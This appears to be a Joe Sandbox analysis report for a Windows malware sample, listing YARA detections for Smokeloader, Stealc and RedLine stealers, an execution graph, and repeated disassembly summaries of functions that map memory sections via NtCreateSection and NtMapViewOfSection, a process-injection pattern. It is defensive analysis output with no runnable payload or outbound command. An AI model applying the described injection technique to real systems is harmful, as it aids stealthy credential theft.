                                                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                File size:327'680 bytes
                                                                                                                                                                                                                                                                                                                                                                MD5 hash:7C0B88535C506FC8BEC1510F08F3329C
                                                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002B.00000002.2972702045.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.2971930000.0000000000443000.00000040.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000002.2973250341.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.2973148017.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                • Detection: 34%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:5.8%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:35.8%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:56.8%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:81
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                                                                                                                  execution_graph 4479 401561 4480 401570 4479->4480 4481 401608 NtDuplicateObject 4480->4481 4487 4018dd 4480->4487 4482 401625 NtCreateSection 4481->4482 4481->4487 4483 4016a5 NtCreateSection 4482->4483 4484 40164b NtMapViewOfSection 4482->4484 4486 4016d1 4483->4486 4483->4487 4484->4483 4485 40166e NtMapViewOfSection 4484->4485 4485->4483 4488 40168c 4485->4488 4486->4487 4489 4016db NtMapViewOfSection 4486->4489 4488->4483 4489->4487 4490 401702 NtMapViewOfSection 4489->4490 4490->4487 4491 401724 4490->4491 4491->4487 4492 401729 3 API calls 4491->4492 4492->4487 4451 402e07 4453 402e1a 4451->4453 4452 40193e 11 API calls 4454 402f54 4452->4454 4453->4452 4453->4454 4401 55003c 4402 550049 4401->4402 4414 550e0f SetErrorMode SetErrorMode 4402->4414 4407 550265 4408 5502ce VirtualProtect 4407->4408 4410 55030b 4408->4410 4409 550439 VirtualFree 4413 5504be LoadLibraryA 4409->4413 4410->4409 4412 5508c7 4413->4412 4415 550223 4414->4415 4416 550d90 4415->4416 4417 550dad 4416->4417 4418 550238 VirtualAlloc 4417->4418 4419 550dbb GetPEB 4417->4419 4418->4407 4419->4418 4467 40194a 4468 40194f 4467->4468 4469 401991 Sleep 4468->4469 4470 4019ac 4469->4470 4471 401553 10 API calls 4470->4471 4472 4019bd 4470->4472 4471->4472 4383 5df1aa 4386 5df1b0 4383->4386 4387 5df1bf 4386->4387 4390 5df950 4387->4390 4393 5df96b 4390->4393 4391 5df974 CreateToolhelp32Snapshot 4392 5df990 Module32First 4391->4392 4391->4393 4394 5df99f 4392->4394 4395 5df1af 4392->4395 4393->4391 4393->4392 4397 5df60f 4394->4397 4398 5df63a 4397->4398 4399 5df64b VirtualAlloc 4398->4399 4400 5df683 4398->4400 4399->4400 4400->4400 4420 402eba 4423 402ecc 4420->4423 4421 402f54 4423->4421 4424 40193e 4423->4424 4425 40194f 4424->4425 4426 401991 Sleep 4425->4426 4427 4019ac 4426->4427 4429 4019bd 4427->4429 4430 401553 4427->4430 4429->4421 4431 401563 4430->4431 4432 4018dd 4431->4432 4433 401608 NtDuplicateObject 4431->4433 4432->4429 4433->4432 4434 401625 NtCreateSection 4433->4434 4435 4016a5 NtCreateSection 4434->4435 4436 40164b NtMapViewOfSection 4434->4436 4435->4432 4438 4016d1 4435->4438 4436->4435 4437 40166e NtMapViewOfSection 4436->4437 4437->4435 4439 40168c 4437->4439 4438->4432 4440 4016db NtMapViewOfSection 4438->4440 4439->4435 4440->4432 4441 401702 NtMapViewOfSection 4440->4441 4441->4432 4442 401724 4441->4442 4442->4432 4444 401729 4442->4444 4445 40172b 4444->4445 4450 401724 4444->4450 4446 4016be NtCreateSection 4445->4446 4445->4450 4447 4016d1 4446->4447 4446->4450 4448 4016db NtMapViewOfSection 4447->4448 4447->4450 4449 401702 NtMapViewOfSection 4448->4449 4448->4450 4449->4450 4450->4432 4539 55092b GetPEB 4540 550972 4539->4540

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 85 401553-4015b2 call 4011cd 97 4015b4 85->97 98 4015b7-4015bc 85->98 97->98 100 4015c2-4015d3 98->100 101 4018df-4018e7 98->101 104 4015d9-401602 100->104 105 4018dd 100->105 101->98 106 4018ec-40193b call 4011cd 101->106 104->105 114 401608-40161f NtDuplicateObject 104->114 105->106 114->105 115 401625-401649 NtCreateSection 114->115 117 4016a5-4016cb NtCreateSection 115->117 118 40164b-40166c NtMapViewOfSection 115->118 117->105 121 4016d1-4016d5 117->121 118->117 120 40166e-40168a NtMapViewOfSection 118->120 120->117 123 40168c-4016a2 120->123 121->105 124 4016db-4016fc NtMapViewOfSection 121->124 123->117 124->105 126 401702-40171e NtMapViewOfSection 124->126 126->105 129 401724 126->129 129->105 131 401724 call 401729 129->131 131->105
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 132 40156b-4015b2 call 4011cd 144 4015b4 132->144 145 4015b7-4015bc 132->145 144->145 147 4015c2-4015d3 145->147 148 4018df-4018e7 145->148 151 4015d9-401602 147->151 152 4018dd 147->152 148->145 153 4018ec-40193b call 4011cd 148->153 151->152 161 401608-40161f NtDuplicateObject 151->161 152->153 161->152 162 401625-401649 NtCreateSection 161->162 164 4016a5-4016cb NtCreateSection 162->164 165 40164b-40166c NtMapViewOfSection 162->165 164->152 168 4016d1-4016d5 164->168 165->164 167 40166e-40168a NtMapViewOfSection 165->167 167->164 170 40168c-4016a2 167->170 168->152 171 4016db-4016fc NtMapViewOfSection 168->171 170->164 171->152 173 401702-40171e NtMapViewOfSection 171->173 173->152 176 401724 173->176 176->152 178 401724 call 401729 176->178 178->152
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 179 401561-4015b2 call 4011cd 189 4015b4 179->189 190 4015b7-4015bc 179->190 189->190 192 4015c2-4015d3 190->192 193 4018df-4018e7 190->193 196 4015d9-401602 192->196 197 4018dd 192->197 193->190 198 4018ec-40193b call 4011cd 193->198 196->197 206 401608-40161f NtDuplicateObject 196->206 197->198 206->197 207 401625-401649 NtCreateSection 206->207 209 4016a5-4016cb NtCreateSection 207->209 210 40164b-40166c NtMapViewOfSection 207->210 209->197 213 4016d1-4016d5 209->213 210->209 212 40166e-40168a NtMapViewOfSection 210->212 212->209 215 40168c-4016a2 212->215 213->197 216 4016db-4016fc NtMapViewOfSection 213->216 215->209 216->197 218 401702-40171e NtMapViewOfSection 216->218 218->197 221 401724 218->221 221->197 223 401724 call 401729 221->223 223->197
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 224 40156f-4015b2 call 4011cd 232 4015b4 224->232 233 4015b7-4015bc 224->233 232->233 235 4015c2-4015d3 233->235 236 4018df-4018e7 233->236 239 4015d9-401602 235->239 240 4018dd 235->240 236->233 241 4018ec-40193b call 4011cd 236->241 239->240 249 401608-40161f NtDuplicateObject 239->249 240->241 249->240 250 401625-401649 NtCreateSection 249->250 252 4016a5-4016cb NtCreateSection 250->252 253 40164b-40166c NtMapViewOfSection 250->253 252->240 256 4016d1-4016d5 252->256 253->252 255 40166e-40168a NtMapViewOfSection 253->255 255->252 258 40168c-4016a2 255->258 256->240 259 4016db-4016fc NtMapViewOfSection 256->259 258->252 259->240 261 401702-40171e NtMapViewOfSection 259->261 261->240 264 401724 261->264 264->240 266 401724 call 401729 264->266 266->240
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 267 401583-4015b2 call 4011cd 276 4015b4 267->276 277 4015b7-4015bc 267->277 276->277 279 4015c2-4015d3 277->279 280 4018df-4018e7 277->280 283 4015d9-401602 279->283 284 4018dd 279->284 280->277 285 4018ec-40193b call 4011cd 280->285 283->284 293 401608-40161f NtDuplicateObject 283->293 284->285 293->284 294 401625-401649 NtCreateSection 293->294 296 4016a5-4016cb NtCreateSection 294->296 297 40164b-40166c NtMapViewOfSection 294->297 296->284 300 4016d1-4016d5 296->300 297->296 299 40166e-40168a NtMapViewOfSection 297->299 299->296 302 40168c-4016a2 299->302 300->284 303 4016db-4016fc NtMapViewOfSection 300->303 302->296 303->284 305 401702-40171e NtMapViewOfSection 303->305 305->284 308 401724 305->308 308->284 310 401724 call 401729 308->310 310->284
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 311 401587-4015b2 call 4011cd 315 4015b4 311->315 316 4015b7-4015bc 311->316 315->316 318 4015c2-4015d3 316->318 319 4018df-4018e7 316->319 322 4015d9-401602 318->322 323 4018dd 318->323 319->316 324 4018ec-40193b call 4011cd 319->324 322->323 332 401608-40161f NtDuplicateObject 322->332 323->324 332->323 333 401625-401649 NtCreateSection 332->333 335 4016a5-4016cb NtCreateSection 333->335 336 40164b-40166c NtMapViewOfSection 333->336 335->323 339 4016d1-4016d5 335->339 336->335 338 40166e-40168a NtMapViewOfSection 336->338 338->335 341 40168c-4016a2 338->341 339->323 342 4016db-4016fc NtMapViewOfSection 339->342 341->335 342->323 344 401702-40171e NtMapViewOfSection 342->344 344->323 347 401724 344->347 347->323 349 401724 call 401729 347->349 349->323
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2135252025.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_S23UhdW5DH.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
